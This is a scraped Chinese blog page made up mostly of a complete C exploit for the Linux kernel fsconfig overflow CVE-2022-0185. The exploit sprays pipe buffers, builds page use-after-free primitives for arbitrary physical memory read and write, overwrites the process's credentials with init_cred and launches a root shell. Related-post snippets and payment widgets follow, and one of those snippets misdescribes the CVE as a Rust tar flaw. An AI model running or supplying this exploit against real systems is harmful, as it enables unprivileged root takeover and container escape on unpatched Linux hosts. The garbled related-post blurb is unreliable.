#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/mount.h>
#include <sys/prctl.h>

#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsmount
#define __NR_fsmount 432
#endif
#ifndef __NR_move_mount
#define __NR_move_mount 429
#endif

int fsopen(const char* fs_name, unsigned int flags)
{
    return syscall(__NR_fsopen, fs_name, flags);
}

int fsconfig(int fd, unsigned int cmd, const char* key, const char* value, int aux)
{
    return syscall(__NR_fsconfig, fd, cmd, key, value, aux);
}

int fsmount(int fs_fd, unsigned int flags, unsigned int attr_flags)
{
    return syscall(__NR_fsmount, fs_fd, flags, attr_flags);
}

int move_mount(int from_dfd, const char* from_path, int to_dfd, const char* to_path, unsigned int flags)
{
    return syscall(__NR_move_mount, from_dfd, from_path, to_dfd, to_path, flags);
}

size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
    size_t page_count;

    page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

    return vmemmap_base + page_count * 0x40;
}

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[34m\033[1m[*] %s\033[0m\n", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: \033[0m%#llx\n", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

void bind_core(int core)
{
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;
struct pipe_buffer {
        struct page *page;
        unsigned int offset, len;
        const struct pipe_buf_operations *ops;
        unsigned int flags;
        unsigned long private;
};

#define SPRAY_PIPE_NUMS 0xF0
#define S_PIPE_BUF_SZ 96
#define T_PIPE_BUF_SZ 192

int pipe_fd[SPRAY_PIPE_NUMS][2];
int orig_idx = -1, victim_idx = -1;
int snd_orig_idx = -1, snd_victim_idx = -1;
int self_1_pipe_idx = -1, self_2_pipe_idx = -1, self_3_pipe_idx = -1;
struct pipe_buffer self_pipe_buf;
struct pipe_buffer self_1_pipe_buf, self_2_pipe_buf, self_3_pipe_buf;

void construct_first_level_page_uaf()
{
        info("Step I - construct first level page uaf");
        int fs_fd;

        puts("[+]  spray pipe_buffer from kmalloc-1k [no cg]");
        for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
        {
                if (pipe(pipe_fd[i]) < 0)
                        err_exit("FAILED to pipe()");
        }

        puts("[+]  fcntl() to spray pipe_buffer from kmalloc-4k [no cg]");
        for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
        {
                if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0)
                        err_exit("FAILED to fcntl() - 4k");

                write(pipe_fd[i][1], "XiaozaYa", 8);
                write(pipe_fd[i][1], &i, sizeof(int));
                write(pipe_fd[i][1], &i, sizeof(int));
                write(pipe_fd[i][1], &i, sizeof(int));
                write(pipe_fd[i][1], "AAAAAAAX", 8);
                write(pipe_fd[i][1], "BBBBBBBX", 8);

                if (i == SPRAY_PIPE_NUMS / 2)
                {
                        puts("[+]  fsopen() a ext4 filesystem and fsconfig() to write 4095 bytes");
                        if ((fs_fd = fsopen("ext4", 0)) <= 0)
                                perror("fsopen"), err_exit("FAILED to fsopen()");

                        for (int j = 0; j < 273; j++)
                        {
                                fsconfig(fs_fd, FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
                        }
                }
        }

        puts("[+]  overflow write null byte to construct SAME PAGE");
        if (fsconfig(fs_fd, FSCONFIG_SET_FLAG, "\x00", NULL, 0) < 0)
                perror("fsconfig"), err_exit("FAILED to trigger overflaow write null byte");

        puts("[+]  CHECK WETHER HIT");
        for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
        {
                int nr;
                char tag[0x10] = { 0 };
                read(pipe_fd[i][0], tag, 8);
                read(pipe_fd[i][0], &nr, sizeof(int));
                if (!strcmp(tag, "XiaozaYa") && nr != i)
                {
                        orig_idx = nr;
                        victim_idx = i;
                }
        }

        if (victim_idx == -1)
                err_exit("FAILED to hit");

        hexx("orig_idx", orig_idx);
        hexx("victim_idx", victim_idx);
        puts("");
}

void construct_second_level_page_uaf()
{
        info("Step II - construct second level page uaf");

        size_t buf[0x1000] = { 0 };
        size_t t_pipe_sz = 0x1000 * (S_PIPE_BUF_SZ/sizeof(struct pipe_buffer));
        write(pipe_fd[victim_idx][1], buf, S_PIPE_BUF_SZ*2 - sizeof(int)*3 - 24);
        read(pipe_fd[victim_idx][0], buf, S_PIPE_BUF_SZ - sizeof(int) - 8);

        close(pipe_fd[orig_idx][0]);
        close(pipe_fd[orig_idx][1]);

        puts("[+]  fcntl() to spray pipe_buffer from kmalloc-96 [no cg]");
        for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
        {
                if (i == victim_idx || i == orig_idx) continue;
                if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, t_pipe_sz) < 0)
                        err_exit("FAILED to fcntl()");
        }

        puts("[+]  CHECK WETHER HIT UAF PAGE");
        read(pipe_fd[victim_idx][0], &self_pipe_buf, sizeof(struct pipe_buffer));
        if (self_pipe_buf.page < 0xffff000000000000)
                err_exit("FAILED to hit UAF PAGE");

        hexx("pipe_buffer.page", self_pipe_buf.page);
        hexx("pipe_buffer.offset", self_pipe_buf.offset);
        hexx("pipe_buffer.len", self_pipe_buf.len);
        hexx("pipe_buffer.ops", self_pipe_buf.ops);
        hexx("pipe_buffer.flags", self_pipe_buf.flags);
        hexx("pipe_buffer.private", self_pipe_buf.private);

        write(pipe_fd[victim_idx][1], &self_pipe_buf, sizeof(struct pipe_buffer));
        puts("[+]  CHECK WETHER HIT");
        for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
        {
                int nr;
                if (i == victim_idx || i == orig_idx) continue;
                read(pipe_fd[i][0], &nr, sizeof(int));
                if (nr < SPRAY_PIPE_NUMS && nr != i)
                {
                        snd_orig_idx = nr;
                        snd_victim_idx = i;
                }
        }

        if (snd_victim_idx == -1)
                err_exit("FAILED to hit");

        hexx("snd_orig_idx", snd_orig_idx);
        hexx("snd_victim_idx", snd_victim_idx);
        puts("");
}

void construct_self_writing_pipe()
{
        info("Step III - construct self writing pipe by second level page UAF");
        size_t buf[0x1000] = { 0 };
        struct pipe_buffer evil_pipe_buf;
        struct page* page_ptr;
        int t_pipe_sz = 0x1000 * (T_PIPE_BUF_SZ/sizeof(struct pipe_buffer));
        write(pipe_fd[snd_victim_idx][1], buf, T_PIPE_BUF_SZ - sizeof(int)*3 - 24);

        close(pipe_fd[snd_orig_idx][0]);
        close(pipe_fd[snd_orig_idx][1]);

        puts("[+]  fcntl() to spray pipe_buffer from kmalloc-192 [no cg]");
        for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
        {
                if (i == victim_idx || i == orig_idx || i == snd_victim_idx || i == snd_orig_idx) continue;
                if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, t_pipe_sz) < 0)
                        err_exit("FAILED to fcntl()");
        }

        puts("[+]  CHECK WETHER HIT UAF PAGE AND HIJACK PIPE_BUFFER TO SELF_PIPE_BUF");
        puts("[+]  construct self writing pipe 1");
        memcpy(&evil_pipe_buf, &self_pipe_buf, sizeof(struct pipe_buffer));
        evil_pipe_buf.offset = T_PIPE_BUF_SZ;
        evil_pipe_buf.len = T_PIPE_BUF_SZ;
        write(pipe_fd[snd_victim_idx][1], &evil_pipe_buf, sizeof(struct pipe_buffer));
        page_ptr = NULL;
        for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
        {
                if (i == victim_idx || i == orig_idx || i == snd_victim_idx || i == snd_orig_idx) continue;
                read(pipe_fd[i][0], &page_ptr, sizeof(struct page*));
                if ((size_t)page_ptr == (size_t)(self_pipe_buf.page))
                {
                        self_1_pipe_idx = i;
                        break;
                }
        }
        if (self_1_pipe_idx == -1)
                err_exit("FAILED to hit");
        hexx("self_1_pipe_idx", self_1_pipe_idx);

        puts("[+]  construct self writing pipe 2");
        write(pipe_fd[snd_victim_idx][1], buf, T_PIPE_BUF_SZ - sizeof(struct pipe_buffer));
        write(pipe_fd[snd_victim_idx][1], &evil_pipe_buf, sizeof(struct pipe_buffer));
        page_ptr = NULL;
        for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
        {
                if (i == victim_idx || i == orig_idx || i == snd_victim_idx || i == snd_orig_idx || i == self_1_pipe_idx) continue;
                read(pipe_fd[i][0], &page_ptr, sizeof(struct page*));
                if ((size_t)page_ptr == (size_t)(self_pipe_buf.page))
                {
                        self_2_pipe_idx = i;
                        break;
                }
        }
        if (self_2_pipe_idx == -1)
                err_exit("FAILED to hit");
        hexx("self_2_pipe_idx", self_2_pipe_idx);

        puts("[+]  construct self writing pipe 3");
        write(pipe_fd[snd_victim_idx][1], buf, T_PIPE_BUF_SZ - sizeof(struct pipe_buffer));
        write(pipe_fd[snd_victim_idx][1], &evil_pipe_buf, sizeof(struct pipe_buffer));
        page_ptr = NULL;
        for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
        {
                if (i == victim_idx || i == orig_idx || i == snd_victim_idx || i == snd_orig_idx || i == self_1_pipe_idx || i == self_2_pipe_idx) continue;
                read(pipe_fd[i][0], &page_ptr, sizeof(struct page*));
                if ((size_t)page_ptr == (size_t)(self_pipe_buf.page))
                {
                        self_3_pipe_idx = i;
                }
        }
        if (self_3_pipe_idx == -1)
                err_exit("FAILED to hit");
        hexx("self_3_pipe_idx", self_3_pipe_idx);
        puts("");
}

void setup_self_writing_pipe()
{
        info("Step IV - setup self writing pipe system");
        memcpy(&self_1_pipe_buf, &self_pipe_buf, sizeof(struct pipe_buffer));
        memcpy(&self_2_pipe_buf, &self_pipe_buf, sizeof(struct pipe_buffer));
        memcpy(&self_3_pipe_buf, &self_pipe_buf, sizeof(struct pipe_buffer));

        self_2_pipe_buf.offset = T_PIPE_BUF_SZ * 3;
        self_2_pipe_buf.len = 0;
        self_3_pipe_buf.offset = T_PIPE_BUF_SZ;
        self_3_pipe_buf.len = 0;

        write(pipe_fd[self_3_pipe_idx][1], &self_2_pipe_buf, sizeof(struct pipe_buffer));

}

void arb_read(struct page* page_ptr, void* dst, size_t len)
{
        char buf[T_PIPE_BUF_SZ] = { 0 };
        self_1_pipe_buf.page = page_ptr;
        self_1_pipe_buf.offset = 0;
        self_1_pipe_buf.len = 0x1000;

        write(pipe_fd[self_2_pipe_idx][1], &self_3_pipe_buf, sizeof(struct pipe_buffer));
        write(pipe_fd[self_3_pipe_idx][1], &self_1_pipe_buf, sizeof(struct pipe_buffer));
        write(pipe_fd[self_3_pipe_idx][1], buf, T_PIPE_BUF_SZ - sizeof(struct pipe_buffer));
        write(pipe_fd[self_3_pipe_idx][1], &self_2_pipe_buf, sizeof(struct pipe_buffer));

        read(pipe_fd[self_1_pipe_idx][0], dst, len);
}

void arb_write(struct page* page_ptr, void* src, size_t len)
{
        char buf[T_PIPE_BUF_SZ] = { 0 };
        self_1_pipe_buf.page = page_ptr;
        self_1_pipe_buf.offset = 0;
        self_1_pipe_buf.len = 0;

        write(pipe_fd[self_2_pipe_idx][1], &self_3_pipe_buf, sizeof(struct pipe_buffer));
        write(pipe_fd[self_3_pipe_idx][1], &self_1_pipe_buf, sizeof(struct pipe_buffer));
        write(pipe_fd[self_3_pipe_idx][1], buf, T_PIPE_BUF_SZ - sizeof(struct pipe_buffer));
        write(pipe_fd[self_3_pipe_idx][1], &self_2_pipe_buf, sizeof(struct pipe_buffer));

        write(pipe_fd[self_1_pipe_idx][1], src, len);
}

void get_root_shell()
{
        info("Pwn Root Root Pwn");
        size_t buf[0x1000];
        puts("[+]  leak vmemmap base and kernel_offset by arb_read");
        vmemmap_base = (size_t)self_pipe_buf.page & 0xfffffffff0000000;
        int f = 10;
        for (;;)
        {
                arb_read(vmemmap_base+157*0x40, buf, 8);
                if (f)
                {
                        hexx("data", buf[0]);
                        f--;
                }
                if (buf[0] > 0xffffffff81000000 && (buf[0]&0xfff) == 0x040)
                {
                        kernel_base = buf[0] - 0x040;
                        kernel_offset = kernel_base - 0xffffffff81000000;
                        break;
                }
                vmemmap_base -= 0x10000000;
        }

        hexx("vmemmap_base", vmemmap_base);
        hexx("kernel_base", kernel_base);
        hexx("kernel_offset", kernel_offset);

        puts("[+]  search current task_struct");
        uint64_t parent_task, current_task;
        uint64_t* comm_addr = NULL;
        size_t base = 0xffff000000000000;
        for (int i = 0; 1; i++)
        {
                memset(buf, 0, sizeof(buf));
                arb_read(vmemmap_base+i*0x40, buf, 0xff0);
                comm_addr = memmem(buf, 0xff0, "XiaozaYaPwner", 0xd);
                if (comm_addr && comm_addr[-2] > base && comm_addr[-3] > base && comm_addr[-56] > base && comm_addr[-55] > base)
                {
                        parent_task = comm_addr[-56];
                        current_task = comm_addr[-49] - 0x960;
                        page_offset_base = (comm_addr[-49]&0xfffffffffffff000) - i*0x1000;
                        page_offset_base &= 0xfffffffff0000000;
                        break;
                }
        }

        hexx("parent_task", parent_task);
        hexx("current_task", current_task);
        hexx("page_offset_base", page_offset_base);

        puts("[+]  replace current cred with init_cred by arb_write");
        init_task = 0xffffffff8281a940  + kernel_offset;
        init_cred = 0xffffffff8286b7a0  + kernel_offset;
        init_nsproxy = 0xffffffff8286b560 + kernel_offset;
        hexx("init_task", init_task);
        hexx("init_cred", init_cred);
        hexx("init_nsproxy", init_nsproxy);

        size_t current_task_page = direct_map_addr_to_page_addr(current_task);
        arb_read(current_task_page, buf, 0xff0);
        arb_read(current_task_page+0x40, &buf[512], 0xff0);

        size_t* tsk_buf = (size_t*)((char*)buf + (current_task&0xfff));
        tsk_buf[346] = init_cred;
        tsk_buf[347] = init_cred;
        tsk_buf[360] = init_nsproxy;

        arb_write(current_task_page, buf, 0xff0);
        arb_write(current_task_page+0x40, &buf[512], 0xff0);

        hexx("UID", getuid());
        system("/bin/sh");
}

int main(int argc, char** argv, char** envp)
{
        bind_core(0);
        if (prctl(PR_SET_NAME, "XiaozaYaPwner", 0, 0, 0) != 0)
                err_exit("FAILED to change process name");

        unshare(CLONE_NEWNS|CLONE_NEWUSER);
        construct_first_level_page_uaf();
        construct_second_level_page_uaf();
        construct_self_writing_pipe();
        setup_self_writing_pipe();
        get_root_shell();
        puts("[+] EXP NEVER END");
        return 0;
}

效果如下:

总结:

自己的堆喷技巧不行,堆喷的效果非常差,非常不稳定,哎,还是多看看别人的 exp 好好学习吧

XiaozaYa
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-0185】Linux kernel [文件系统挂载API] 溢出漏洞分析与利用
夜栩的博客
06-17 1257
利用技术允许我们将绝大多数的内核中的内存损坏漏洞(甚至仅是一个 '\0' 字节的溢出)转换为无需任何特权的无限的对物理内存的任意读能力,并能完美绕过包括 KASLR、SMEP、SMAP 在内的多项主流缓解措施,因此笔者选择使用这项技术完成漏洞利用。的所有操作在一个系统调用中完成,因此这需要我们进行条件竞争,而常规的条件竞争通常很难成功,那么我们不难想到的是我们可以利用。在完成了空白的文件系统上下文的创建之后,我们还需要对其进行相应的配置,以便于后续的挂载操作,这个配置的功能对应到的就是。
CVE-2022-0185 价值$3w的 File System Context 内核整数溢出漏洞利用分析
panhewu9919的博客
04-11 1606
本漏洞作者在kctf环境上成功完成了提权和逃逸,并获得了 google kCTF vulnerability reward program 项目奖励的 31,337 美金的奖励(该项目对能从有nsjail 沙箱的Linux内核提权,奖励31,337 到 91,337 美元,由于syzbot平台上有人比作者早6天先发现了这个漏洞,作者并非首次发现该漏洞,只是完成了kctf提权,便获得了最低奖金)。 影响版本:Linux-v5.1~v5.16.2。5.1-rc1 引入漏洞,Linux-v5.16.2已修补 ,由
[漏洞分析] CVE-2022-0185 linux 内核提权(逃逸)
热门推荐
Breeze的博客
02-18 1万+
CVE-2022-0185 分析 文章目录CVE-2022-0185 分析漏洞简介环境搭建漏洞原理漏洞复现POC漏洞利用EXP参考 漏洞简介 漏洞编号: CVE-2022-0185 漏洞产品: linux kernel - fsconfig syscall 影响版本: linux kernel 5.1-rc1 ~ 源码获取: apt source linux-image-unsigned-5.13.0-25-generic 或 https://mirrors.edge.kernel.org/pub/linu
CVE-2022-0185漏洞利用工具
gitblog_00009的博客
03-05 344
CVE-2022-0185漏洞利用工具 项目简介 CVE-2022-0185是一个安全漏洞,影响了Rust编程语言中的tar库。此漏洞允许攻击者通过恶意创建的归档文件来进行远程代码执行。为了帮助开发人员理解和检测他们自己的应用程序是否受到影响,我们开发了一个名为Crusaders-of-Rust的利用工具。 请注意:本工具仅用于教育和评估目的,不得用于非法活动。在使用之前,请确保您已了解相关法律...
Linux 内核漏洞可用于逃逸 Kubernetes 容器
smellycat000的专栏
01-26 395
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Linux 内核中存在漏洞 (CVE-2022-0185),可用于逃逸 Kubernetes 中的容器,从而访问位于主机系统上的资源。安...
CVE-2022-1015:nf_tables 中整数溢出导致的栈溢出
qq_61670993的博客
05-16 1071
nf_tables 中整数溢出导致的栈溢出
CVE-2022-4510:Binwalk 远程代码执行漏洞
07-03
具体成因通常涉及到缓冲区溢出、类型混淆、整数溢出等编程错误。 **PoC文件分析** "malicious.pfs"是一个可能包含利用此漏洞的PoC(Proof of Concept)文件。PoC文件是研究人员为了证明某个漏洞确实存在而创建的,...
Nginx-Remote-Integer-Overflow-Vulnerability:CVE-2017-7529
04-13
**Nginx远程整数溢出漏洞:CVE-2017-7529** 在2017年,Nginx服务器发现了一个严重的安全漏洞,被命名为CVE-2017-7529,它是一个远程整数溢出漏洞。这个漏洞主要影响了Nginx的HTTP模块,允许攻击者通过精心构造的...
CVE-2014-4481:Apple CoreGraphics 框架在解析 CCITT 组 3 编码数据时无法验证输入,从而导致溢出情况。 来自输入的受控数据可能会溢出内存分配,从而导致在 Mobile Safari 上下文中执行任意代码
06-28
CoreGraphics CCITT 内存损坏 - CVE-2014-4481 Apple CoreGraphics 框架在解析 CCITT 组 3 编码数据时无法验证输入,从而导致溢出情况。 来自输入的受控数据可能会溢出...客户端/整数溢出/内存损坏咨询:HT204245
cve-2023-21839漏洞工具
04-10
例如,缓冲区溢出整数溢出、格式字符串错误、输入验证不足、权限提升等。具体到 CVE-2023-21839,其分类可能涉及其中的一种或多种,但具体细节需要根据官方披露的信息来确定。 ### 影响与危害 1. **系统安全**:...
CVE-2021-42287(Windows域服务权限提升漏洞)
weixin_45682070的博客
12-16 2462
PAC PAC(Privilege Attribute Certificate),特权属性证书 需要提供User的SID和所在组Group的SID 只看上述的就简单解释并不能很清晰的了解,那么想要知道PAC这个概念,我们首先理一下kerberos的流程 网上很多kerberos如下: 1:用户向KDC发起AS_REQ,请求凭据是用户hash加密的时间戳,KDC使用用户hash进行解密,如果结果正确返回用krbtgt hash加密的TGT票据 2:用户凭借TGT票据向KDC发起针对特定服务的TGS_REQ
udp分片报文pcap文件
07-18
udp分片报文pcap文件:64kudp大包分成每片658字节总计100片
计算机教学导案.doc
07-18
计算机
摩根:2024年大市前瞻.pdf
最新发布
07-18
摩根:2024年大市前瞻
计算机控制专业技术专题实习任务书温度控制.doc
07-18
计算机
计算机控制系统.doc
07-18
计算机
计算机模拟考试.doc
07-18
计算机
CVE-2022-34918 nftables溢出漏洞原理
06-10
CVE-2022-34918是一种nftables溢出漏洞,由于nftables在处理用户输入时存在缺陷,攻击者可以构造恶意输入,导致nftables在处理时发生溢出,从而执行任意代码或导致拒绝服务攻击。 具体来说,nftables是Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值